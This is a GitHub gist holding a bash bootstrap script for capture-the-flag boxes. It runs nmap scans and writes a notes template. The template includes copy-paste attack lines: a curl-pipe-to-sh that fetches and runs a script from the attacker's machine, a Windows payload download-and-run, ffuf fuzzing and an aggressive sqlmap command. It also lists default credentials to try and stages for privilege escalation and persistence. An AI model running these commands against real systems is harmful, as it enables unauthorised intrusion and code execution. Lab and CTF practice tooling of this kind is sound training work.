Skip to content

Instantly share code, notes, and snippets.

@dreizehnutters

dreizehnutters/prepX.sh

Created May 28, 2023 22:24
Show Gist options
  • Save dreizehnutters/455bf5558b1c339362747fc8b6af39b7 to your computer and use it in GitHub Desktop.
Save dreizehnutters/455bf5558b1c339362747fc8b6af39b7 to your computer and use it in GitHub Desktop.
Download ZIP
my little CTF bootstrap script
Raw
prepX.sh
#!/bin/bash
# ./prepX.sh <IP> <BOX_PATH> <INTERFACE>
bold=$(tput bold);
normal=$(tput sgr0);
NMAP_MIN_RATE=500;
convert_xml_to_csv() {
XMLS=/usr/bin/xmlstarlet
NMAP_PATH="$1/nmap"
$XMLS sel -t -m '//port/state[@state="open"]/parent::port' \
-v 'ancestor::host/address[@addrtype="ipv4"]/@addr' \
-o : -v './@portid' -n "$NMAP_PATH"/*.xml | sort -u -V | \
cut -d ':' -f2- | sed ':a;N;$!ba;s/\n/,/g'
}
get_my_ip() {
IP_ADDRESS=$(ip -o -4 addr show dev "$IFACE" | awk '{print $4}' | cut -d '/' -f1)
if [[ -z "$IP_ADDRESS" ]]; then
echo "[!] Failed to retrieve IP address for interface '$IFACE'."
exit 1
fi
}
if [ -z "$1" ] || [ -z "$2" ]
then
echo "$0 <IP> <NAME> <INTERFACE>";
exit 1;
fi
IP=$1;
BOX=$2;
IFACE=$3;
NMAP_BIN=/usr/bin/nmap;
NMAP_FILE=$BOX_PATH/nmap/init.nmap;
export IP=$IP;
get_my_ip
export MYIP=$IP_ADDRESS
BOX_PATH="$PWD/$BOX";
echo "[*] box path $BOX_PATH";
mkdir -p $BOX_PATH && cd $BOX_PATH;
mkdir -p nmap;
mkdir -p www;
echo "${bold}[[[[ ping $BOX@$IP ]]]]${normal}";
ping $IP -c 2;
echo "$IP $BOX" | sudo tee -a /etc/hosts;
echo "${bold}[[[[ min tcp scan ]]]]${normal}";
sudo $NMAP_BIN -p- -n -v -Pn -d1 --min-rate=$NMAP_MIN_RATE -T5 -oA nmap/init $IP;
echo "${bold}[[[ checking version on port(s): $(convert_xml_to_csv "$PWD") ]]]${normal}";
sudo $NMAP_BIN -T5 -v -n --version-all -Pn -sCV --min-rate=$NMAP_MIN_RATE -p$(convert_xml_to_csv "$PWD") -oA nmap/version ${IP};
TMP=$(cat "$BOX_PATH/nmap/version.nmap" | grep "open")
FTMP=$(cat "$NMAP_FILE" | grep -Po '[0-9]*/tcp.*filtered' | sed 's/\/filtered//g')
FILE_NAME="$BOX""_notes.md";
cat <<EOF >> $FILE_NAME
# $BOX notes
> `date`
# copypastes
\`\`\`bash
> env
export IP=$IP
export MYIP=$MYIP
> uploads
curl $MYIP:9090/lin.sh|sh|tee lin.out
curl $MYIP:9090/win.sh -o win.exe; win.exe log
> fuzz
ffuf -u httpS://$BOX -H 'Host: FUZZ.$BOX' -w /opt/goto.wordlist -mc all
ffuf -u httpS://$IP/FUZZ -w /opt/goto.wordlist -mc all
> sqlmap
sqlmap.py -u $BOX --headers=X-Forwarded-For:* --random-agent --risk=3 --level=5 --no-cast --threads=10 --tamper=between --drop-set-cookie --union-char=1 --ignore-code=500 --batch [--forceSSL]
----------------------
\`\`\`
# gathered credentials:
+ admin:admin
+ anonymous:
---
# network
## open ports
```
while IFS='' read -r line;
do echo -e "### $line\n";
done <<< "$TMP"
```
## filtered ports
`echo $FTMP`
## subnets/VLANs
+ $IP
## foothold
> steps for RCE
---
# post exploit 1
## local enum
> group access rights
> systen config
> processes
## privEsc/pivot
> TODO
## persistans
> TODO
---
EOF
mkdir -p /home/kali/vaults/wiki/_Project/workdir/${BOX};
ln $BOX_PATH/$FILE_NAME /home/kali/vaults/wiki/_Project/workdir/${BOX}/$FILE_NAME;
subl $FILE_NAME&
echo "${bold}[[[ checking extended scripts on port(s): $(convert_xml_to_csv "$PWD") ]]]]${normal}";
sudo $NMAP_BIN -T5 -v -n -Pn --host-timeout=0 --script=discovery -p$(convert_xml_to_csv "$PWD") -oN nmap/discovery.nmap ${IP};
echo "${bold}[[[[ nmap min udp ]]]]${normal}";
sudo $NMAP_BIN -sUV -F --version-intensity 0 -Pn -v -n -T5 -oN nmap/uinit ${IP};
exit 0;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment